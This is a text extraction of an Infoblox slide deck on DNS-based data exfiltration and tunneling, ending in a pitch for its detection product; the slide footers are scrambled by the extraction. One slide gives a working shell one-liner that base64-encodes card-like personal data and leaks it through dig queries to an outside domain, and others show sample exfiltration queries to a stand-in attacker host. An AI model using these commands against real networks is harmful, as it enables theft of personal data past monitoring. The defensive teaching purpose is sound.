Professional Documents
Culture Documents
1 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
How to Secure Your Data From DNS based Exfiltration
Philip Parker, Vadim Pavlov
95056.39
2
2 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Who are we?
Philip Parker
Vadim Pavlov
3
3 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Agenda
4
4 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
What the Bad Guys are After and Why
Information like social security numbers of employees or customers
PII (Personally
that cybercriminals can use to steal identity, or sell in the
Identifiable Information) underground market for profit
Regulated Data Data related to PCI DSS and HIPAA compliance that can be misused
Other Sensitive Credit card numbers, company financials, payroll and emails and deny
Information access to this and other data (Ransomware)
A recent
$4 M high-profile data
breach is likely to
cost more than4
Average consolidated
cost of a data breach3
$100M.
6
6 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Data Exfiltration/Infiltration DNS Queries
• Sophisticated (zero-day)
• Infected endpoint gets access to file containing Attacker controller
server- thief.com
sensitive data (C&C)
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
7
7 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
DNS Exfiltration
Client request
$ echo " John/Smith/1234123412340987/94040 " | base64 | xargs -I '{}' dig {}.xn---d1asm.net
;; QUESTION SECTION:
;IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net. IN A
;; AUTHORITY SECTION:
xn---d1asm.net. 1800 IN SOA ns1.xn--d1asm.net. root.xn---d1asm.net. 201702301 3600 3600 3600 1800
8
8 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
DNS Infiltration
Client request
$ dig dnsmsg....xn---d1asm.net TXT
;; QUESTION SECTION:
;dnsmsg....xn---d1asm.net. IN TXT
9
9 || ©©2017
2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Communications via DNS Tunneling
• Uses DNS as a covert communication channel to bypass Internet
firewalls
• Attacker tunnels other protocols like SSH, or web within DNS INTERNET
• SplitBrain
Client-side
• DNS2TCP tunnel program
10 | | ©©2017
10 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Infoblox ActiveTrust® Cloud
11 | | ©©2017
11 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Traditional Network Security does not address
Security Gap in DNS
Advanced DNS Block Zero Day Data Block advance malware Block DNS Server
Threats vs Network Exfiltration & communications over attacks (e.g.
Security Layers Infiltration over DNS DNS (e.g. DGA,Fast Flux) NXDomain, Hijack)
Sandboxing (APT) No No No
NGFW, IDS/IPS No No No
DLP No No No
12 | | ©©2017
12 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
ActiveTrust® Cloud—Functional Summary
Highly scalable protection for devices on-premises, roaming and in remote office/branch office
Detect and Contain Prevent DNS Based Data Exfiltration Improved Visibility
Malware using DNS That Other Systems Can’t Detect and Context
13 | | ©©2017
13 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Components
ActiveTrust Cloud tightly integrates with on-premises DDI for enriched visibility and ecosystem integrations
14 | | ©©2017
14 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
ATC Workflow Scenarios Encrypted DNS Query,
Embeds Client ID and MAC
Connector
15 | | ©©2017
15 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Threat Insight - Behavior Analytics
with Machine Learning
Entropy
Detects and prevents 0-day DNS based
threats
Size Lexical
Automatically adds destinations to RPZ Analysis
feed and scales enforcement
Model
Detects and prevents:
• DNS Tunneling
Frequency N-Gram
• Data Exfiltration/Infiltration
• DGA
• Fastflux
• DNS Messenger
16 | | ©©2017
16 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
How Behavior Analytics Works
Detects sophisticated data exfiltration techniques
that don’t have well-known signatures (zero day)
17 | | ©©2017
17 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
How DNS Threat Insight Works to Detect Data
Exfiltration Threat Insight analyzes based on
Queried Domains
Malicious Normal
MRZGS3TLEBWW64TFEBXXMYLMOR
UW4ZI.t.joedomain.com www.google.com
*.t.joedomain.com Inca.Infoblox.com
NVWW2IDPOZQWY5DJNZSQ.t.joedoma
in.com
18 | | ©©2017
18 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
The Motion of Malware Through Networks
Malware uses DNS at every stage
Penetration/Infiltration Infection Ex/Infiltration
Query malicious domains and Download Malware to the Transport the data offsite
report to C &C infected host
DNS Server
19 | | ©©2017
19 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.
Demo
20 | | ©©2017
20 2013 Infoblox
Infoblox Inc.
Inc. All All Reserved.
Rights Rights Reserved.